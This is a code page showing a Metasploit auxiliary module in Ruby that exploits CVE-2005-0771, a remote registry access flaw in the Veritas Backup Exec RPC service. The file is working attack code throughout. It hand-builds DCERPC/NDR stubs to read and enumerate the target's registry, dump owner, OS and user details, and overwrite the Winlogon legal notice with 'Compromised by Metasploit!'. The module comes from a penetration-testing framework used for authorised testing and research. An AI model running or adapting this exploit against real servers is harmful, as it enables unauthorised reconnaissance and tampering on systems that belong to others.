Sign upLogin

rapid7/metasploit-framework

View on GitHub
Star
modules/auxiliary/admin/backupexec/registry.rb

Summary

Maintainability
A
2 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Post::Windows::Registry

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Veritas Backup Exec Server Registry Access',
      'Description'    => %q{
        This modules exploits a remote registry access flaw in the BackupExec Windows
      Server RPC service. This vulnerability was discovered by Pedram Amini and is based
      on the NDR stub information posted to openrce.org.
      Please see the action list for the different attack modes.

      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '17627' ],
          [ 'CVE', '2005-0771' ],
          [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],
        ],
      'Actions'     =>
        [
          ['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],
          ['Create Logon Notice', 'Description' => 'Add a logon notice']
        ],
      'DefaultAction' => 'System Information'
      ))

      register_options(
        [
          Opt::RPORT(6106),
          OptString.new('WARN',
            [
              false,
              "The warning to display for the Logon Notice action",
              "Compromised by Metasploit!\r\n"
            ]
          ),
        ])
  end

  def auxiliary_commands
    return {
      "regread" => "Read a registry value",
      # "regenum" => "Enumerate registry keys",
    }
  end

  def run
    case action.name
      when 'System Information'
        system_info()
      when 'Create Logon Notice'
        logon_notice()
    end
  end


  def cmd_regread(*args)

    if (args.length == 0)
      print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
      return
    end

    paths  = args[0].split("\\")
    hive   = paths.shift
    subval = paths.pop
    subkey = paths.join("\\")
    data   = backupexec_regread(hive, subkey, subval)

    if (data)
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
    end

  end

  def cmd_regenum(*args)

    if (args.length == 0)
      print_status("Usage: regenum HKLM\\\\Software")
      return
    end

    paths  = args[0].split("\\")
    hive   = paths.shift
    subkey = "\\" + paths.join("\\")
    data   = backupexec_regenum(hive, subkey)

    if (data)
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to enumerate #{hive}\\#{subkey}...")
    end

  end

  def system_info
    print_status("Dumping system information...")

    prod_id   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
    prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
    prod_sp   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
    owner     = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
    company   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
    cpu       = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
    username  = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'

    print_status("The current interactive user is #{deunicode(username)}")
    print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
    print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
    print_status("The system runs on a #{deunicode(cpu)}")
  end

  def logon_notice
    print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
    backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText',  REG_SZ, datastore['WARN'])
    backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption',  REG_SZ, 'METASPLOIT')
  end


  def deunicode(str)
    str.gsub(/\x00/, '').strip
  end

  #
  # Write a registry key
  #
  def backupexec_regwrite(hive, subkey, subval, type, data)
    stub = backupexec_regrpc_write(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type,
      :data => data
    )
    resp = backupexec_regrpc_call(5, stub)
    return false if resp.length == 0
    return true
  end

  #
  # Read a registry key
  #
  def backupexec_regread(hive, subkey, subval, type = REG_SZ)
    stub = backupexec_regrpc_read(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type
    )
    resp = backupexec_regrpc_call(4, stub)

    return nil if resp.length == 0
    ret, len = resp[0,8].unpack('VV')
    return nil if ret == 0
    return nil if len == 0
    return resp[8, len]
  end

  #
  # Enumerate a registry key
  #
  def backupexec_regenum(hive, subkey)
    stub = backupexec_regrpc_enum(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey
    )
    resp = backupexec_regrpc_call(7, stub)
    p resp

    return nil if resp.length == 0
    ret, len = resp[0,8].unpack('VV')
    return nil if ret == 0
    return nil if len == 0
    return resp[8, len]
  end

  #
  # Call the backupexec registry service
  #
  def backupexec_regrpc_call(opnum, data = '')

    handle = dcerpc_handle(
      '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
      'ncacn_ip_tcp', [datastore['RPORT']]
    )

    dcerpc_bind(handle)

    resp = dcerpc.call(opnum, data)
    outp = ''

    if (dcerpc.last_response and dcerpc.last_response.stub_data)
      outp = dcerpc.last_response.stub_data
    end

    disconnect

    outp
  end

  # RPC Service 4
  def backupexec_regrpc_read(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE
    type   = opts[:type]   || REG_SZ

    stub =
      NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(1024) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
    return stub
  end

  # RPC Service 7
  def backupexec_regrpc_enum(opts = {})
    subkey = opts[:subkey] || ''
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE
    stub =
      NDR.UnicodeConformantVaryingString(subkey) +
      NDR.long(4096) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
    return stub
  end

  # RPC Service 5
  def backupexec_regrpc_write(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE
    type   = opts[:type]   || REG_SZ
    data   = opts[:data]   || ''

    if (type == REG_SZ || type == REG_EXPAND_SZ)
      data = Rex::Text.to_unicode(data+"\x00")
    end

    stub =
      NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(data.length) +
      NDR.long(data.length) +
      data +
      NDR.align(data) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
    return stub
  end
end